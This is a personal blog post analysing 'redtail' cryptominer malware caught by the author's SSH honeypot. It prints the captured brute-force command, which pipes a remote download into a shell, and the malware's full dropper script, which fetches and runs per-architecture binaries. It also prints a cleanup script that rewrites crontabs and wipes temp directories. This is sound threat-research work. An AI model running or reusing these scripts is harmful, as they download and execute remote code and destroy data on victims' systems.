Darkfoe's Blog

redtail cryptominer malware - in the honeypot

2026-03-01 11:00pm

Finally began deploying my homemade honeypot (emulated ssh server), and starting to get some interesting results, such as the below:

{
    "ip":"[redacted]",
    "rdns":"",
    "user":"root",
    "password":"[redacted - not important anyway]",
    "session_id":"e062ee72-efdc-41f1-ab8d-f8638b85ad03",
    "timestamp":{
        "session_start":"2026-03-02T04:09:24.410659709Z",
        "session_end":"2026-03-02T04:09:24.842450321Z"},
        "commands":[
            {
                "timestamp":"2026-03-02T04:09:24.751221551Z",
                "command":"uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"; (wget --no-check-certificate -qO- https://[redacted]/sh || curl -sk https://[redacted]/sh) | sh -s ssh"
            }
        ]
}

So breaking down the /sh part - I found it seems to run a cleanup script and downloads a binary based on the architechure. Also does a few checks on the way (see below)

#!/bin/bash

get_random_string() {
  len=$(expr $(od -An -N2 -i /dev/urandom 2>/dev/null | tr -d ' ') % 32 + 4 2>/dev/null)

  if command -v openssl >/dev/null 2>&1; then
    str=$(openssl rand -base64 256 2>/dev/null | tr -dc 'A-Za-z0-9' | head -c "$len")
    if [ -n "$str" ]; then
      echo "$str"
      return 0
    fi
  fi

  if [ -r /dev/urandom ]; then
    str=$(tr -dc 'A-Za-z0-9' </dev/urandom 2>/dev/null | head -c "$len")
    if [ -n "$str" ]; then
      echo "$str"
      return 0
    fi
  fi

  if [ -n "$RANDOM" ]; then
    echo "$RANDOM"
    return 0
  fi

  # If all else fails
  echo "redtail"
  return 1
}

dlr() {
  rm -rf $1
  wget --no-check-certificate -q https://[redacted]/$1 || curl -skO https://[redacted]/$1
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true
FILENAME=".$(get_random_string)"

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
rm -rf $FILENAME

if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 $FILENAME
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 $FILENAME
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 $FILENAME
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 $FILENAME
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >$FILENAME
    chmod +x $FILENAME
    ./$FILENAME $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x $FILENAME
  ./$FILENAME $1 >/dev/null 2>&1
fi

And for its cleanup script it wants to run:

#!/bin/bash

clean_crontab() {
  chattr -ia "$1"
  grep -vE 'wget|curl|/dev/tcp|/tmp|\.sh|nc|bash -i|sh -i|base64 -d' "$1" >/tmp/clean_crontab
  mv /tmp/clean_crontab "$1"
}

systemctl disable c3pool_miner
systemctl stop c3pool_miner

chattr -ia /var/spool/cron/crontabs
for user_cron in /var/spool/cron/crontabs/*; do
  [ -f "$user_cron" ] && clean_crontab "$user_cron"
done

for system_cron in /etc/crontab /etc/crontabs; do
  [ -f "$system_cron" ] && clean_crontab "$system_cron"
done

for dir in /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly /etc/cron.d; do
  chattr -ia "$dir"
  for system_cron in "$dir"/*; do
    [ -f "$system_cron" ] && clean_crontab "$system_cron"
  done
done

clean_crontab /etc/anacrontab

for i in /tmp /var/tmp /dev/shm; do
  rm -rf $i/*
done

After some analysis of the binaries I have discovered nothing unexpected - ie in this case this was an XMR cryptominer with a unique name of "redtail" inside it, supporting multiple architechures. Likely hitting any IOT or VPS it can grab. Completely automated, roughly half hour intervals between attempting user/password combos until it gets in - then it seems roughly 8-12 hour reinfection attempts.

Unforurtunately, I was unable to get its configuration, so was not able to get a wallet address or command and control server. Server serving the binaries seems to just be a binary staging server, nothing special, so no leads there.

Will continue monitoring it for now to see if I find anything else. Eventually will build a analysis "pipeline" to see if I can see it evolve as it keeps retrying to re-infect.